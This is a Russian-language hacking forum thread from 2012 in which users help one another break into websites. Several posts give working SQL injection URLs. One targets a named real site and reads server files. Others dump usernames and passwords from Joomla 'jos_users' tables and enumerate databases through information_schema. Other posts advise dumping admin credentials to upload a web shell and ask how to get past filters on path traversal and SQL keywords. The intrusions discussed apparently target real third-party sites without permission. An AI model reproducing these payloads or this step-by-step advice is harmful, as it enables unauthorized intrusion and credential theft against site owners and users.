Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    ну я впринцепи хотел услышать ответ только о ssl.спасибо ;_)
     
  2. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    посоны, нид хелп. наглухо фильтруется union, select, from. любое наличие одного из операторов приводит к редиректу, урл кодирование не помогло, нормализации нет (uni/**/on), POST фильтруется. хз что можно ещё придумать, но придумать нужно кровь из носа.
     
  3. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Обычно, когда я натыкаюсь на всякие редиректы, а также отданные сервером странички типа "Not Acceptable" и "Method Not Implemented" балуюсь с материалами из этой методички. Ну и нужно помнить про /*!sql-code*/ и /*!12345sql-code*/ Возможно, поможет.
     
  4. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    я ведь написал - ЛЮБОЕ наличие оператора приводит к редиректу. все тривиальные методы испробованы. :(
     
  5. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Ну, я же не телепат и не могу знать, что конкретно вы использовали. Просто привел справочный материал, в котором довольно полно собраны все, как вы выразились, тривиальные методы. Ведь вполне возможно, вы что-то могли и упустить. В любом случае, я всего лишь хотел помочь. Удачи в вашем мозговом штурме.
     
  6. skier529

    skier529 New Member

    Joined:
    8 May 2009
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Пациент:
    Fiile_priv Y + доступ к PhpInfo.
    Пробовал залить мини-шелл след образом:
    Выдает ошибку:
    ЧТо можно с ним сделать?
    P.S Если у кого-то есть время, то напишите плиз в ЛС, чтобы разобрать этот пример.
    P.S1 эх, первый шелл был так близок =((...
     
  7. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Видимо вообще нету никуда прав на запись. Ищи админки от сайта/поддоменов, ищи пути до корней этих поддоменов, ищи настройки подключения к бд и таблицы с полями для авторизации, дампь лог/пас, заходи в админку и лей шел.
     
    #20327 Melfis, 4 May 2012
    Last edited: 4 May 2012
  8. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    skier529, у тебя там фряха стоит, поэтому можешь читать содержимое папки, а не только файла, потому пробуй админку посмотреть ну и тд и тп...

    Пример:
    Code:
    http://www.aviel[antigoogle]ru/txt/new.php?id=32270-9.999+union+select+1,load_file('/usr/local/www/aviel/www')3,4,5,6,7,8,9,10,11+from+mysql.user+--+
    
     
    #20328 cat1vo, 4 May 2012
    Last edited: 4 May 2012
    1 person likes this.
  9. Cock3r

    Cock3r New Member

    Joined:
    19 Jan 2011
    Messages:
    14
    Likes Received:
    3
    Reputations:
    0
    как получить список пользователей wordpress?без админки
     
  10. Compton

    Compton Member

    Joined:
    31 Jan 2010
    Messages:
    290
    Likes Received:
    25
    Reputations:
    0
    если есть скуль,то раскручивать ее до инфы с таблицы wp_users
     
  11. Cock3r

    Cock3r New Member

    Joined:
    19 Jan 2011
    Messages:
    14
    Likes Received:
    3
    Reputations:
    0
    а если нету?
     
  12. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Вы хотите без уязвимости сделать дамп БД? Извините, Вы не маг случайно?
     
  13. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Есть инклуд, есть ава, есть ошибка, по которой виден путь.

    Но ава почему-то не инклудится, хотя другие картинки инклудятся. Все вроде на 1-м сервере.

    Это Mod rewrite шалит?

    Как понять что за фигня?
     
  14. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    мод реврайт не действует для инклудов
    ну вот наверное не на 1 сервере, или что то не правильно делаешь, чтобы наверняка найди настройки апача и посмотри есть ли там такой хост
    если сам не можешь, выложи, что гадать то, мож и поможет кто
     
  15. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Раскручиваю sql- иньекцию.

    Наугад нашел таблицу games.
    Запрос вида:
    работает.
    Запрос типа:
    не работает.
    Хотя таблицу games в БД я найти не могу. А таблицу jos_users - могу найти. но вывести данные не получается.

    - срабатывает.

    Подозреваю на фильтрацию или некорректную кодировку в базе данных.

    Вопрос, как можно будет зафильтровать jos_users, чтобы можно было делать запросы и выводить данные из логина-паролей типа:
    PHP:
    game.php?gameid=-1+union+select+1,concat_ws(0x03a,id,username,password),3,4,5,6,7,8+FROM+jos_users--
     
  16. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    А я подозреваю что таблица в другой бд
     
  17. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Если в таком случае - как правильно создать запрос для вывода данных из другой базы данных?
     
  18. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to Muracha

    PHP:
    game.php?gameid=-1+union+select+1,concat_ws(0x03a,id,username,password),3,4,5,6,7,8+FROM+anotherdb.jos_users--  
    Для вывода таблиц из другой базы данных

    PHP:
    select table_name from information_schema.tables where table_schema='anotherdb' limit 0,1;
    Так же делаем с колонками

    PHP:
    select column_name from information_schema.columns where table_name='jos_users' and table_schema='anotherdb' limit 0,1;
     
    #20338 cat1vo, 5 May 2012
    Last edited: 5 May 2012
  19. skier529

    skier529 New Member

    Joined:
    8 May 2009
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Не знаю туда или нет, но все-таки спрошу:
    Есть доступ к админке, там есть возможность заливки pdf файла. В итоге файл получает ссылку вида http://shell.com/download.php?id=418.
    В БД никаких упоминай о файле... По крайней мере в данных к которым у меня есть доступ.
    Вопрос в том как этот файл запустить.
    P.S По этой ссылке выдает ошибку "Не удалось загрузить документ PDF.
     
  20. TorRom

    TorRom New Member

    Joined:
    29 Apr 2012
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    Существует ли альтернатива для поднятия на директорию выше?
    Code:
    /../
    \..\
    /..\
    \../
    ^^ фильтруются

    Подняться на одну могу через ../ Выше никак.

    Выдаёт:
    Code:
    Forbidden
    
    You don't have permission to access /script.php on this server.
    
    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
     
Thread Status:
Not open for further replies.